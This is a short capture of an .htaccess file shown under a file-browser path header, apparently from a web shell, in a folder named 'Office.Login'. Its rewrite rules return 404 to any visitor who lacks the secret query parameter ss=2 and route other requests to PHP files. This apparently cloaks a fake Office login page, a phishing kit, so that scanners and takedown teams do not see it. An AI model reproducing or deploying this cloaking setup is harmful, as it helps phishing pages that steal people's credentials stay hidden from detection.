| Current Path : /home/rcskiev/public_html/Office.Login/ |
| Current File : /home/rcskiev/public_html/Office.Login/.htaccess |
RewriteEngine On
RewriteCond %{QUERY_STRING} !(^|&)ss=2(&|$)
RewriteRule ^(.*)$ / [R=404,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^([^\.]+)$ $1.php [NC,L]